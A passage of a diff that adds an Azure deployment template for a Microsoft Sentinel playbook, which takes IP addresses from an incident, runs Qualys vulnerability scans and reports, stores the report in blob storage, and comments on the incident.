utcNow())}]]>\n\t\t</INFO>\n\t\n\t\n\t\t\n\t\t\t\n\t\t\n\t\t\n\t\t\t\n\t\t\n\t\n\t\n\t\t\n\t\t\t\n\t\t\n\t\t\n\t\t\t\n\t\t\n\t\t\n\t\t\t\n\t\t\n\t\t\n\t\t\t\n\t\t\n\t\t\n\t\t\t\n\t\t\n\t\t\n\t\t\t\n\t\t\n\t\t\n\t\t\t\n\t\t\n\t\t\n\t\t\t\n\t\t\n\t\t\n\t\t\t\n\t\t\n\t\t\n\t\t\t\n\t\t\n\t\t\n\t\t\t\n\t\t\n\t\t\n\t\t\t\n\t\t\n\t\t\n\t\t\t\n\t\t\n\t\t\n\t\t\t\n\t\t\n\t\t\n\t\t\t\n\t\t\n\t\t\n\t\t\t\n\t\t\n\t\t\n\t\t\t\n\t\t\n\t\t\n\t\t\t\n\t\t\n\t\t\n\t\t\t\n\t\t\n\t\t\n\t\t\t\n\t\t\n\t\t\n\t\t\t\n\t\t\n\t\t\n\t\t\t\n\t\t\n\t\t\n\t\t\t\n\t\t\n\t\t\n\t\t\t\n\t\t\n\t\t\n\t\t\t\n\t\t\n\t\t\n\t\t\t\n\t\t\n\t\t\n\t\t\t\n\t\t\n\t\t\n\t\t\t\n\t\t\n\t\t\n\t\t\t\n\t\t\n\t\t\n\t\t\t\n\t\t\n\t\n\t\n\t\t\n\t\t\t\n\t\t\n\t\t\n\t\t\t\n\t\t\n\t\t\n\t\t\t\n\t\t\n\t\t\n\t\t\t\n\t\t\n\t\t\n\t\t\t\n\t\t\n\t\t\n\t\t\t\n\t\t\n\t\t\n\t\t\t\n\t\t\n\t\t\n\t\t\t\n\t\t\n\t\t\n\t\t\t\n\t\t\n\t\t\n\t\t\t\n\t\t\n\t\t\n\t\t\t\n\t\t\n\t\t\n\t\t\t\n\t\t\n\t\t\n\t\t\t\n\t\t\n\t\t\n\t\t\t\n\t\t\n\t\t\n\t\t\t\n\t\t\n\t\t\n\t\t\t\n\t\t\n\t\t\n\t\t\t\n\t\t\n\t\t\n\t\t\t\n\t\t\n\t\t\n\t\t\t\n\t\t\n\t\n\t\n\t\t\n\t\t\t\n\t\t\n\t\n", + "headers": { + "Content-Type": "text/xml", + "X-Requested-With": "Sentinel" + }, + "host": { + "connection": { + "name": "@parameters('$connections')['QualysCustomConnector']['connectionId']" + } + }, + "method": "post", + "path": "/api/2.0/fo/report/template/scan/", + "queries": { + "action": "create", + "report_format": "xml" + } + } + }, + "Create_blob_(V2)": { + "runAfter": { + "Download_Scan_Report": [ + "Succeeded" + ] + }, + "type": "ApiConnection", + "inputs": { + "body": "@body('Download_Scan_Report')", + "headers": { + "ReadFileMetadataFromServer": true + }, + "host": { + "connection": { + "name": "@parameters('$connections')['azureblob']['connectionId']" + } + }, + "method": "post", + "path": "/v2/datasets/@{encodeURIComponent(encodeURIComponent('AccountNameFromSettings'))}/files", + "queries": { + "folderPath": "/report-blob", + "name": "@{concat('ScanReport_', utcNow())}", + "queryParametersSingleEncoded": true + } + }, + "runtimeConfiguration": { + "contentTransfer": { + "transferMode": "Chunked" + } + } + }, + "Delay_1_Minute": { + "runAfter": { + "Parse_Launch_Scan_Report_Output": [ + "Succeeded" + ] + }, + "type": "Wait", + "inputs": { + "interval": { + "count": 1, + "unit": "Minute" + } + } + }, + "Delete_Option_Profile": { + "runAfter": { + "Add_comment_to_incident_(V3)": [ + "Succeeded", + "TimedOut", + "Skipped", + "Failed" + ] + }, + "type": "ApiConnection", + "inputs": { + "headers": { + "X-Requested-With": "Sentinel" + }, + "host": { + "connection": { + "name": "@parameters('$connections')['QualysCustomConnector']['connectionId']" + } + }, + "method": "post", + "path": "/api/2.0/fo/subscription/option_profile/vm/", + "queries": { + "action": "delete", + "id": "@body('Parse_Launch_Scan_Report_Output')?['SIMPLE_RETURN']?['RESPONSE']?['ITEM_LIST']?['ITEM']?['VALUE']" + } + } + }, + "Delete_Scan_Report_Template": { + "runAfter": { + "Delete_Option_Profile": [ + "Succeeded", + "TimedOut", + "Skipped", + "Failed" + ] + }, + "type": "ApiConnection", + "inputs": { + "headers": { + "Content-Type": "text/xml", + "X-Requested-With": "Sentinel" + }, + "host": { + "connection": { + "name": "@parameters('$connections')['QualysCustomConnector']['connectionId']" + } + }, + "method": "post", + "path": "/api/2.0/fo/report/template/scan/", + "queries": { + "action": "delete", + "template_id": "@body('Parse_Scan_Report_Template_Output')?['SIMPLE_RETURN']?['RESPONSE']?['ITEM_LIST']?['ITEM']?['VALUE']" + } + } + }, + "Download_Scan_Report": { + "runAfter": { + "Wait_Until_Report_Generation_is_Finished": [ + "Succeeded" + ] + }, + "type": "ApiConnection", + "inputs": { + "headers": { + "X-Requested-With": "Sentinel" + }, + "host": { + "connection": { + "name": "@parameters('$connections')['QualysCustomConnector']['connectionId']" + } + }, + "method": "post", + "path": "/api/2.0/fo/report/", + "queries": { + "action": "fetch", + "id": "@body('Parse_Launch_Scan_Report_Output')?['SIMPLE_RETURN']?['RESPONSE']?['ITEM_LIST']?['ITEM']?['VALUE']" + } + }, + "runtimeConfiguration": { + "staticResult": { + "staticResultOptions": "Disabled", + "name": "Download_Scan_Report0" + } + } + }, + "Entities_-_Get_IPs": { + "type": "ApiConnection", + "inputs": { + "body": "@triggerBody()?['object']?['properties']?['relatedEntities']", + "host": { + "connection": { + "name": "@parameters('$connections')['azuresentinel']['connectionId']" + } + }, + "method": "post", + "path": "/entities/ip" + } + }, + "For_each_IP_Address": { + "foreach": "@body('Entities_-_Get_IPs')?['IPs']", + "actions": { + "Append_to_IP_Address_List": { + "runAfter": { + "Get_Asset_Details_By_IP": [ + "Succeeded" + ] + }, + "type": "AppendToArrayVariable", + "inputs": { + "name": "IPAddresses", + "value": "@items('For_each_IP_Address')?['Address']" + } + }, + "Check_if_Asset_Scanned_in_last_24_Hours": { + "actions": { + "List_of_IP_Addresses_to_Scan": { + "type": "AppendToArrayVariable", + "inputs": { + "name": "IPAddrToScan", + "value": "@items('For_each_IP_Address')?['Address']" + } + } + }, + "runAfter": { + "Parse_Asset_Details": [ + "Succeeded" + ] + }, + "else": { + "actions": { + "Check_if_IP_is_configured_for_scanning": { + "actions": { + "Append_to_Incident_Comment": { + "type": "AppendToStringVariable", + "inputs": { + "name": "IncidentComment", + "value": "@{items('For_each_IP_Address')?['Address']} IP Address is not configured for scanning.\n" + } + } + }, + "expression": { + "and": [ + { + "equals": [ + "@body('Parse_Asset_Details')?['HOST_LIST_OUTPUT']?['RESPONSE']?['HOST_LIST']?['HOST']?['LAST_VM_SCANNED_DATE']", + null + ] + } + ] + }, + "type": "If" + } + } + }, + "expression": { + "and": [ + { + "not": { + "equals": [ + "@body('Parse_Asset_Details')?['HOST_LIST_OUTPUT']?['RESPONSE']?['HOST_LIST']?['HOST']?['LAST_VM_SCANNED_DATE']", + null + ] + } + }, + { + "less": [ + "@body('Parse_Asset_Details')?['HOST_LIST_OUTPUT']?['RESPONSE']?['HOST_LIST']?['HOST']?['LAST_VM_SCANNED_DATE']", + "@subtractFromTime(utcNow(), 24, 'Hour')" + ] + } + ] + }, + "type": "If", + "description": "rtrert" + }, + "Get_Asset_Details_By_IP": { + "type": "ApiConnection", + "inputs": { + "headers": { + "X-Requested-With": "Sentinel" + }, + "host": { + "connection": { + "name": "@parameters('$connections')['QualysCustomConnector']['connectionId']" + } + }, + "method": "post", + "path": "/api/2.0/fo/asset/host/", + "queries": { + "action": "list", + "details": "All", + "ips": "@items('For_each_IP_Address')?['Address']" + } + } + }, + "Parse_Asset_Details": { + "runAfter": { + "Append_to_IP_Address_List": [ + "Succeeded" + ] + }, + "type": "ParseJson", + "inputs": { + "content": "@json(xml(base64ToString(body('Get_Asset_Details_By_IP')?['$content'])))", + "schema": { + "properties": { + "HOST_LIST_OUTPUT": { + "properties": { + "REQUEST": { + "properties": { + "DATETIME": { + "type": [ + "object", + "string", + "null" + ] + }, + "PARAM_LIST": { + "properties": { + "PARAM": { + "properties": { + "KEY": { + "type": [ + "object", + "string", + "null" + ] + }, + "VALUE": { + "type": [ + "object", + "string", + "null" + ] + } + }, + "type": "object" + } + }, + "type": "object" + }, + "POST_DATA": { + "type": [ + "object", + "string", + "null" + ] + }, + "RESOURCE": { + "type": [ + "object", + "string", + "null" + ] + }, + "USER_LOGIN": { + "type": [ + "object", + "string", + "null" + ] + } + }, + "type": "object" + }, + "RESPONSE": { + "properties": { + "DATETIME": { + "type": [ + "object", + "string", + "null" + ] + }, + "GLOSSARY": { + "properties": { + "ASSET_GROUP_LIST": { + "properties": { + "ASSET_GROUP": { + "properties": { + "ID": { + "type": [ + "object", + "string", + "null" + ] + }, + "TITLE": { + "type": [ + "object", + "string", + "null" + ] + } + }, + "type": "object" + } + }, + "type": "object" + }, + "USER_DEF": { + "properties": { + "LABEL_1": { + "type": [ + "object", + "string", + "null" + ] + }, + "LABEL_2": { + "type": [ + "object", + "string", + "null" + ] + }, + "LABEL_3": { + "type": [ + "object", + "string", + "null" + ] + }, + "VALUE_1": { + "properties": { + "__text": { + "type": [ + "object", + "string", + "null" + ] + }, + "_ud_attr": { + "type": [ + "object", + "string", + "null" + ] + } + }, + "type": "object" + }, + "VALUE_2": { + "properties": { + "__text": { + "type": [ + "object", + "string", + "null" + ] + }, + "_ud_attr": { + "type": [ + "object", + "string", + "null" + ] + } + }, + "type": "object" + }, + "VALUE_3": { + "properties": { + "__text": { + "type": [ + "object", + "string", + "null" + ] + }, + "_ud_attr": { + "type": [ + "object", + "string", + "null" + ] + } + }, + "type": "object" + } + }, + "type": "object" + }, + "USER_LIST": { + "properties": { + "USER": { + "properties": { + "FIRST_NAME": { + "type": [ + "object", + "string", + "null" + ] + }, + "LAST_NAME": { + "type": [ + "object", + "string", + "null" + ] + }, + "USER_LOGIN": { + "type": [ + "object", + "string", + "null" + ] + } + }, + "type": "object" + } + }, + "type": "object" + } + }, + "type": "object" + }, + "HOST_LIST": { + "properties": { + "HOST": { + "properties": { + "ARS_FACTORS": { + "properties": { + "ARS_FORMULA": { + "type": [ + "object", + "string", + "null" + ] + }, + "VULN_COUNT": { + "properties": { + "__text": { + "type": [ + "object", + "string", + "null" + ] + }, + "_qds_severity": { + "type": [ + "object", + "string", + "null" + ] + } + }, + "type": "object" + } + }, + "type": "object" + }, + "ASSET_CRITICALITY_SCORE": { + "type": [ + "object", + "string", + "null" + ] + }, + "ASSET_GROUP_IDS": { + "type": [ + "object", + "string", + "null" + ] + }, + "ASSET_ID": { + "type": [ + "object", + "string", + "null" + ] + }, + "ASSET_RISK_SCORE": { + "type": [ + "object", + "string", + "null" + ] + }, + "CLOUD_PROVIDER": { + "type": [ + "object", + "string", + "null" + ] + }, + "CLOUD_PROVIDER_TAGS": { + "properties": { + "CLOUD_TAG": { + "properties": { + "LAST_SUCCESS_DATE": { + "type": [ + "object", + "string", + "null" + ] + }, + "NAME": { + "type": [ + "object", + "string", + "null" + ] + }, + "VALUE": { + "type": [ + "object", + "string", + "null" + ] + } + }, + "type": "object" + } + }, + "type": "object" + }, + "CLOUD_RESOURCE_ID": { + "type": [ + "object", + "string", + "null" + ] + }, + "CLOUD_SERVICE": { + "type": [ + "object", + "string", + "null" + ] + }, + "COMMENTS": { + "type": [ + "object", + "string", + "null" + ] + }, + "DNS": { + "type": [ + "object", + "string", + "null" + ] + }, + "DNS_DATA": { + "properties": { + "DOMAIN": { + "type": [ + "object", + "string", + "null" + ] + }, + "FQDN": { + "type": [ + "object", + "string", + "null" + ] + }, + "HOSTNAME": { + "type": [ + "object", + "string", + "null" + ] + } + }, + "type": "object" + }, + "EC2_INSTANCE_ID": { + "type": [ + "object", + "string", + "null" + ] + }, + "ID": { + "type": [ + "object", + "string", + "null" + ] + }, + "IP": { + "type": [ + "object", + "string", + "null" + ] + }, + "IPV6": { + "type": [ + "object", + "string", + "null" + ] + }, + "LAST_COMPLIANCE_SCAN_DATETIME": { + "type": [ + "object", + "string", + "null" + ] + }, + "LAST_SCAP_SCAN_DATETIME": { + "type": [ + "object", + "string", + "null" + ] + }, + "LAST_VM_AUTH_SCANNED_DATE": { + "type": [ + "object", + "string", + "null" + ] + }, + "LAST_VM_AUTH_SCANNED_DURATION": { + "type": [ + "object", + "string", + "null" + ] + }, + "LAST_VM_SCANNED_DATE": { + "type": [ + "object", + "string", + "null" + ] + }, + "LAST_VM_SCANNED_DURATION": { + "type": [ + "object", + "string", + "null" + ] + }, + "LAST_VULN_SCAN_DATETIME": { + "type": [ + "object", + "string", + "null" + ] + }, + "METADATA": { + "properties": { + "AZURE": { + "properties": { + "ATTRIBUTE": { + "properties": { + "LAST_ERROR": { + "type": [ + "object", + "string", + "null" + ] + }, + "LAST_ERROR_DATE": { + "type": [ + "object", + "string", + "null" + ] + }, + "LAST_STATUS": { + "type": [ + "object", + "string", + "null" + ] + }, + "LAST_SUCCESS_DATE": { + "type": [ + "object", + "string", + "null" + ] + }, + "NAME": { + "type": [ + "object", + "string", + "null" + ] + }, + "VALUE": { + "type": [ + "object", + "string", + "null" + ] + } + }, + "type": "object" + } + }, + "type": "object" + }, + "EC2": { + "properties": { + "ATTRIBUTE": { + "properties": { + "LAST_ERROR": { + "type": [ + "object", + "string", + "null" + ] + }, + "LAST_ERROR_DATE": { + "type": [ + "object", + "string", + "null" + ] + }, + "LAST_STATUS": { + "type": [ + "object", + "string", + "null" + ] + }, + "LAST_SUCCESS_DATE": { + "type": [ + "object", + "string", + "null" + ] + }, + "NAME": { + "type": [ + "object", + "string", + "null" + ] + }, + "VALUE": { + "type": [ + "object", + "string", + "null" + ] + } + }, + "type": "object" + } + }, + "type": "object" + }, + "GOOGLE": { + "properties": { + "ATTRIBUTE": { + "properties": { + "LAST_ERROR": { + "type": [ + "object", + "string", + "null" + ] + }, + "LAST_ERROR_DATE": { + "type": [ + "object", + "string", + "null" + ] + }, + "LAST_STATUS": { + "type": [ + "object", + "string", + "null" + ] + }, + "LAST_SUCCESS_DATE": { + "type": [ + "object", + "string", + "null" + ] + }, + "NAME": { + "type": [ + "object", + "string", + "null" + ] + }, + "VALUE": { + "type": [ + "object", + "string", + "null" + ] + } + }, + "type": "object" + } + }, + "type": "object" + } + }, + "type": "object" + }, + "NETBIOS": { + "type": [ + "object", + "string", + "null" + ] + }, + "NETWORK_ID": { + "type": [ + "object", + "string", + "null" + ] + }, + "OS": { + "type": [ + "object", + "string", + "null" + ] + }, + "OWNER": { + "type": [ + "object", + "string", + "null" + ] + }, + "QG_HOSTID": { + "type": [ + "object", + "string", + "null" + ] + }, + "TAGS": { + "properties": { + "TAG": { + "properties": { + "NAME": { + "type": [ + "object", + "string", + "null" + ] + }, + "TAG_ID": { + "type": [ + "object", + "string", + "null" + ] + } + }, + "type": "object" + } + }, + "type": "object" + }, + "TRACKING_METHOD": { + "type": [ + "object", + "string", + "null" + ] + }, + "USER_DEF": { + "properties": { + "LABEL_1": { + "type": [ + "object", + "string", + "null" + ] + }, + "LABEL_2": { + "type": [ + "object", + "string", + "null" + ] + }, + "LABEL_3": { + "type": [ + "object", + "string", + "null" + ] + }, + "VALUE_1": { + "properties": { + "__text": { + "type": [ + "object", + "string", + "null" + ] + }, + "_ud_attr": { + "type": [ + "object", + "string", + "null" + ] + } + }, + "type": "object" + }, + "VALUE_2": { + "properties": { + "__text": { + "type": [ + "object", + "string", + "null" + ] + }, + "_ud_attr": { + "type": [ + "object", + "string", + "null" + ] + } + }, + "type": "object" + }, + "VALUE_3": { + "properties": { + "__text": { + "type": [ + "object", + "string", + "null" + ] + }, + "_ud_attr": { + "type": [ + "object", + "string", + "null" + ] + } + }, + "type": "object" + } + }, + "type": "object" + } + }, + "type": "object" + } + }, + "type": "object" + }, + "ID_SET": { + "properties": { + "ID": { + "type": [ + "object", + "string", + "null" + ] + }, + "ID_RANGE": { + "type": [ + "object", + "string", + "null" + ] + } + }, + "type": "object" + }, + "WARNING": { + "properties": { + "CODE": { + "type": [ + "object", + "string", + "null" + ] + }, + "TEXT": { + "type": [ + "object", + "string", + "null" + ] + }, + "URL": { + "type": [ + "object", + "string", + "null" + ] + } + }, + "type": "object" + } + }, + "type": "object" + } + }, + "type": "object" + } + }, + "type": "object" + } + } + } + }, + "runAfter": { + "Initialize_variable_-_IncidentComment": [ + "Succeeded" + ] + }, + "type": "Foreach", + "runtimeConfiguration": { + "concurrency": { + "repetitions": 1 + } + } + }, + "Get_Report_Status": { + "runAfter": { + "Delay_1_Minute": [ + "Succeeded" + ] + }, + "type": "ApiConnection", + "inputs": { + "headers": { + "X-Requested-With": "Sentinel" + }, + "host": { + "connection": { + "name": "@parameters('$connections')['QualysCustomConnector']['connectionId']" + } + }, + "method": "post", + "path": "/api/2.0/fo/report/", + "queries": { + "action": "list", + "id": "@int(body('Parse_Launch_Scan_Report_Output')?['SIMPLE_RETURN']?['RESPONSE']?['ITEM_LIST']?['ITEM']?['VALUE'])" + } + } + }, + "Initialize_variable_-_IPAddrToScan": { + "runAfter": { + "Initialize_variable_-_IPAddresses": [ + "Succeeded" + ] + }, + "type": "InitializeVariable", + "inputs": { + "variables": [ + { + "name": "IPAddrToScan", + "type": "array" + } + ] + } + }, + "Initialize_variable_-_IPAddresses": { + "runAfter": { + "Entities_-_Get_IPs": [ + "Succeeded" + ] + }, + "type": "InitializeVariable", + "inputs": { + "variables": [ + { + "name": "IPAddresses", + "type": "array" + } + ] + } + }, + "Initialize_variable_-_IncidentComment": { + "runAfter": { + "Initialize_variable_-_ReportStatus": [ + "Succeeded" + ] + }, + "type": "InitializeVariable", + "inputs": { + "variables": [ + { + "name": "IncidentComment", + "type": "string" + } + ] + } + }, + "Initialize_variable_-_ReportStatus": { + "runAfter": { + "Initialize_variable_-_ScanStatus": [ + "Succeeded" + ] + }, + "type": "InitializeVariable", + "inputs": { + "variables": [ + { + "name": "ReportStatus", + "type": "string" + } + ] + } + }, + "Initialize_variable_-_ScanRef": { + "runAfter": { + "Initialize_variable_-_Scanner": [ + "Succeeded" + ] + }, + "type": "InitializeVariable", + "inputs": { + "variables": [ + { + "name": "ScanRef", + "type": "string" + } + ] + } + }, + "Initialize_variable_-_ScanStatus": { + "runAfter": { + "Initialize_variable_-_ScanRef": [ + "Succeeded" + ] + }, + "type": "InitializeVariable", + "inputs": { + "variables": [ + { + "name": "ScanStatus", + "type": "string" + } + ] + } + }, + "Initialize_variable_-_Scanner": { + "runAfter": { + "Initialize_variable_-_IPAddrToScan": [ + "Succeeded" + ] + }, + "type": "InitializeVariable", + "inputs": { + "variables": [ + { + "name": "Scanner", + "type": "string", + "value": "null" + } + ] + } + }, + "Launch_VM_Scan_Report": { + "runAfter": { + "Parse_Scan_Report_Template_Output": [ + "Succeeded" + ] + }, + "type": "ApiConnection", + "inputs": { + "headers": { + "X-Requested-With": "Sentinel" + }, + "host": { + "connection": { + "name": "@parameters('$connections')['QualysCustomConnector']['connectionId']" + } + }, + "method": "post", + "path": "/api/2.0/fo/report/", + "queries": { + "action": "launch", + "output_format": "pdf", + "report_title": "@{concat('ScanReport_', utcNow())}", + "report_type": "Scan", + "template_id": "@body('Parse_Scan_Report_Template_Output')?['SIMPLE_RETURN']?['RESPONSE']?['ITEM_LIST']?['ITEM']?['VALUE']" + } + } + }, + "Parse_Launch_Scan_Report_Output": { + "runAfter": { + "Launch_VM_Scan_Report": [ + "Succeeded" + ] + }, + "type": "ParseJson", + "inputs": { + "content": "@json(xml(body('Launch_VM_Scan_Report')))", + "schema": { + "properties": { + "SIMPLE_RETURN": { + "properties": { + "REQUEST": { + "properties": { + "DATETIME": { + "type": "string" + }, + "PARAM_LIST": { + "properties": { + "PARAM": { + "properties": { + "KEY": { + "type": "string" + }, + "VALUE": { + "type": "string" + } + }, + "type": "object" + } + }, + "type": "object" + }, + "POST_DATA": { + "type": "string" + }, + "RESOURCE": { + "type": "string" + }, + "USER_LOGIN": { + "type": "string" + } + }, + "type": "object" + }, + "RESPONSE": { + "properties": { + "CODE": { + "type": "string" + }, + "DATETIME": { + "type": "string" + }, + "ITEM_LIST": { + "properties": { + "ITEM": { + "properties": { + "KEY": { + "type": "string" + }, + "VALUE": { + "type": "string" + } + }, + "type": "object" + } + }, + "type": "object" + }, + "TEXT": { + "type": "string" + } + }, + "type": "object" + } + }, + "type": "object" + } + }, + "type": "object" + } + } + }, + "Parse_Report_Status": { + "runAfter": { + "Get_Report_Status": [ + "Succeeded" + ] + }, + "type": "ParseJson", + "inputs": { + "content": "@json(xml(body('Get_Report_Status')))", + "schema": { + "properties": { + "REPORT_LIST_OUTPUT": { + "properties": { + "RESPONSE": { + "properties": { + "DATETIME": { + "type": "string" + }, + "REPORT_LIST": { + "properties": { + "REPORT": { + "properties": { + "EXPIRATION_DATETIME": { + "type": "string" + }, + "ID": { + "type": "string" + }, + "LAUNCH_DATETIME": { + "type": "string" + }, + "OUTPUT_FORMAT": { + "type": "string" + }, + "SIZE": { + "type": "string" + }, + "STATUS": { + "properties": { + "MESSAGE": { + "properties": { + "#cdata-section": { + "type": "string" + } + }, + "type": "object" + }, + "PERCENT": { + "type": "string" + }, + "STATE": { + "type": "string" + } + }, + "type": "object" + }, + "TITLE": { + "properties": { + "#cdata-section": { + "type": "string" + } + }, + "type": "object" + }, + "TYPE": { + "type": "string" + }, + "USER_LOGIN": { + "type": "string" + } + }, + "type": "object" + } + }, + "type": "object" + } + }, + "type": "object" + } + }, + "type": "object" + } + }, + "type": "object" + } + } + }, + "Parse_Scan_Report_Template_Output": { + "runAfter": { + "Create_Scan_Report_Template": [ + "Succeeded" + ] + }, + "type": "ParseJson", + "inputs": { + "content": "@json(xml(body('Create_Scan_Report_Template')))", + "schema": { + "properties": { + "!DOCTYPE": { + "properties": { + "@@name": { + "type": "string" + }, + "@@system": { + "type": "string" + } + }, + "type": "object" + }, + "?xml": { + "properties": { + "@@encoding": { + "type": "string" + }, + "@@version": { + "type": "string" + } + }, + "type": "object" + }, + "SIMPLE_RETURN": { + "properties": { + "RESPONSE": { + "properties": { + "DATETIME": { + "type": "string" + }, + "ITEM_LIST": { + "properties": { + "ITEM": { + "properties": { + "KEY": { + "type": "string" + }, + "VALUE": { + "type": "string" + } + }, + "type": "object" + } + }, + "type": "object" + }, + "TEXT": { + "type": "string" + } + }, + "type": "object" + } + }, + "type": "object" + } + }, + "type": "object" + } + } + }, + "Set_variable_-_ReportStatus": { + "runAfter": { + "Parse_Report_Status": [ + "Succeeded" + ] + }, + "type": "SetVariable", + "inputs": { + "name": "ReportStatus", + "value": "@body('Parse_Report_Status')?['REPORT_LIST_OUTPUT']?['RESPONSE']?['REPORT_LIST']?['REPORT']?['STATUS']?['STATE']" + } + }, + "Wait_Until_Report_Generation_is_Finished": { + "actions": { + "Delay_for_3_minutes": { + "type": "Wait", + "inputs": { + "interval": { + "count": 3, + "unit": "Minute" + } + } + }, + "Get_Report_Status_Again": { + "runAfter": { + "Delay_for_3_minutes": [ + "Succeeded" + ] + }, + "type": "ApiConnection", + "inputs": { + "headers": { + "X-Requested-With": "Sentinel" + }, + "host": { + "connection": { + "name": "@parameters('$connections')['QualysCustomConnector']['connectionId']" + } + }, + "method": "post", + "path": "/api/2.0/fo/report/", + "queries": { + "action": "list", + "id": "@int(body('Parse_Launch_Scan_Report_Output')?['SIMPLE_RETURN']?['RESPONSE']?['ITEM_LIST']?['ITEM']?['VALUE'])" + } + } + }, + "Parse_Report_Status_Again": { + "runAfter": { + "Get_Report_Status_Again": [ + "Succeeded" + ] + }, + "type": "ParseJson", + "inputs": { + "content": "@json(xml(body('Get_Report_Status_Again')))", + "schema": { + "properties": { + "REPORT_LIST_OUTPUT": { + "properties": { + "RESPONSE": { + "properties": { + "DATETIME": { + "type": "string" + }, + "REPORT_LIST": { + "properties": { + "REPORT": { + "properties": { + "EXPIRATION_DATETIME": { + "type": "string" + }, + "ID": { + "type": "string" + }, + "LAUNCH_DATETIME": { + "type": "string" + }, + "OUTPUT_FORMAT": { + "type": "string" + }, + "SIZE": { + "type": "string" + }, + "STATUS": { + "properties": { + "MESSAGE": { + "properties": { + "#cdata-section": { + "type": "string" + } + }, + "type": "object" + }, + "PERCENT": { + "type": "string" + }, + "STATE": { + "type": "string" + } + }, + "type": "object" + }, + "TITLE": { + "properties": { + "#cdata-section": { + "type": "string" + } + }, + "type": "object" + }, + "TYPE": { + "type": "string" + }, + "USER_LOGIN": { + "type": "string" + } + }, + "type": "object" + } + }, + "type": "object" + } + }, + "type": "object" + } + }, + "type": "object" + } + }, + "type": "object" + } + } + }, + "Update_variable_-_ReportStatus": { + "runAfter": { + "Parse_Report_Status_Again": [ + "Succeeded" + ] + }, + "type": "SetVariable", + "inputs": { + "name": "ReportStatus", + "value": "@body('Parse_Report_Status_Again')?['REPORT_LIST_OUTPUT']?['RESPONSE']?['REPORT_LIST']?['REPORT']?['STATUS']?['STATE']" + } + } + }, + "runAfter": { + "Set_variable_-_ReportStatus": [ + "Succeeded" + ] + }, + "expression": "@equals(variables('ReportStatus'), 'Finished')", + "limit": { + "count": 60, + "timeout": "PT3H" + }, + "type": "Until" + } + } + }, + "parameters": { + "$connections": { + "value": { + "QualysCustomConnector": { + "connectionId": "[[resourceId('Microsoft.Web/connections', variables('QualyscustomconnectorConnectionName'))]", + "connectionName": "[[variables('QualyscustomconnectorConnectionName')]", + "id": "[[concat('/subscriptions/', subscription().subscriptionId, '/resourceGroups/', resourceGroup().name, '/providers/Microsoft.Web/customApis/', parameters('CustomConnectorName'))]" + }, + "azureblob": { + "connectionId": "[[resourceId('Microsoft.Web/connections', variables('AzureblobConnectionName'))]", + "connectionName": "[[variables('AzureblobConnectionName')]", + "id": "[[concat('/subscriptions/', subscription().subscriptionId, '/providers/Microsoft.Web/locations/', variables('workspace-location-inline'), '/managedApis/Azureblob')]" + }, + "azuresentinel": { + "connectionId": "[[resourceId('Microsoft.Web/connections', variables('MicrosoftSentinelConnectionName'))]", + "connectionName": "[[variables('MicrosoftSentinelConnectionName')]", + "id": "[[concat('/subscriptions/', subscription().subscriptionId, '/providers/Microsoft.Web/locations/', variables('workspace-location-inline'), '/managedApis/Azuresentinel')]", + "connectionProperties": { + "authentication": { + "type": "ManagedServiceIdentity" + } + } + } + } + } + } + }, + "name": "[[parameters('PlaybookName')]", + "type": "Microsoft.Logic/workflows", + "location": "[[variables('workspace-location-inline')]", + "tags": { + "hidden-SentinelTemplateName": "QualysVM-LaunchVMScan-GenerateReport", + "hidden-SentinelTemplateVersion": "1.0", + "hidden-SentinelWorkspaceId": "[[variables('workspaceResourceId')]" + }, + "identity": { + "type": "SystemAssigned" + }, + "apiVersion": "2017-07-01", + "dependsOn": [ + "[[resourceId('Microsoft.Web/connections', variables('QualyscustomconnectorConnectionName'))]", + "[[resourceId('Microsoft.Web/connections', variables('AzureblobConnectionName'))]", + "[[resourceId('Microsoft.Web/connections', variables('MicrosoftSentinelConnectionName'))]" + ] + }, + { + "type": "Microsoft.Web/connections", + "apiVersion": "2016-06-01", + "name": "[[variables('QualyscustomconnectorConnectionName')]", + "location": "[[variables('workspace-location-inline')]", + "kind": "V1", + "properties": { + "displayName": "[[variables('QualyscustomconnectorConnectionName')]", + "api": { + "id": "[[variables('_connection-2')]" + } + } + }, + { + "type": "Microsoft.Web/connections", + "apiVersion": "2016-06-01", + "name": "[[variables('AzureblobConnectionName')]", + "location": "[[variables('workspace-location-inline')]", + "kind": "V1", + "properties": { + "displayName": "[[variables('AzureblobConnectionName')]", + "api": { + "id": "[[variables('_connection-3')]" + }, + "parameterValues": { + "accountName": "[[variables('AzureBlobStorageName')]", + "accessKey": "[[listKeys(variables('StorageAccountId'), '2019-04-01').keys[0].value]" + } + } + }, + { + "type": "Microsoft.Web/connections", + "apiVersion": "2016-06-01", + "name": "[[variables('MicrosoftSentinelConnectionName')]", + "location": "[[variables('workspace-location-inline')]", + "kind": "V1", + "properties": { + "displayName": "[[variables('MicrosoftSentinelConnectionName')]", + "parameterValueType": "Alternative", + "api": { + "id": "[[variables('_connection-4')]" + } + } + }, + { + "type": "Microsoft.OperationalInsights/workspaces/providers/metadata", + "apiVersion": "2022-01-01-preview", + "name": "[concat(parameters('workspace'),'/Microsoft.SecurityInsights/',concat('Playbook-', last(split(variables('playbookId5'),'/'))))]", + "properties": { + "parentId": "[variables('playbookId5')]", + "contentId": "[variables('_playbookContentId5')]", + "kind": "Playbook", + "version": "[variables('playbookVersion5')]", + "source": { + "kind": "Solution", + "name": "QualysVM", + "sourceId": "[variables('_solutionId')]" + }, + "author": { + "name": "Microsoft", + "email": "[variables('_email')]" + }, + "support": { + "name": "Microsoft Corporation", + "email": "support@microsoft.com", + "tier": "Microsoft", + "link": "https://support.microsoft.com" + }, + "dependencies": { + "criteria": [ + { + "kind": "LogicAppsCustomConnector", + "contentId": "[variables('_QualysCustomConnector')]", + "version": "[variables('playbookVersion1')]" + } + ] + } + } + } + ], + "metadata": { + "title": "QualysVM-LaunchVMScan-GenerateReport", + "description": "When a new sentinel incident is created, this playbook gets triggered and performs the following actions: \n 1. Get IP Addresses from incident. \n 2. Scan IP Addresses with Qualys Scanner. \n 3. Generate the Scan Report. \n 4. Download the report and store it to a blob storage. \n 5. Add the link of report as a comment to the incident.", + "prerequisites": [ + "1. Prior to the deployment of this playbook, Qualys Logic App Custom Connector needs to be deployed under the same subscription.", + "2. Refer to [Qualys Logic App Custom Connector](../QualysCustomConnector/readme.md) documentation for deployment instructions." + ], + "postDeployment": [ + "None" + ], + "lastUpdateTime": "2022-09-13T22:25:52Z", + "entities": [ + "IP" + ], + "tags": [ + "Qualys", + "Enrichment", + "VM Scan" + ], + "releaseNotes": { + "version": "1.0", + "title": "[variables('blanks')]", + "notes": [ + "Initial version" + ] + } + } + }, + "packageKind": "Solution", + "packageVersion": "[variables('_solutionVersion')]", + 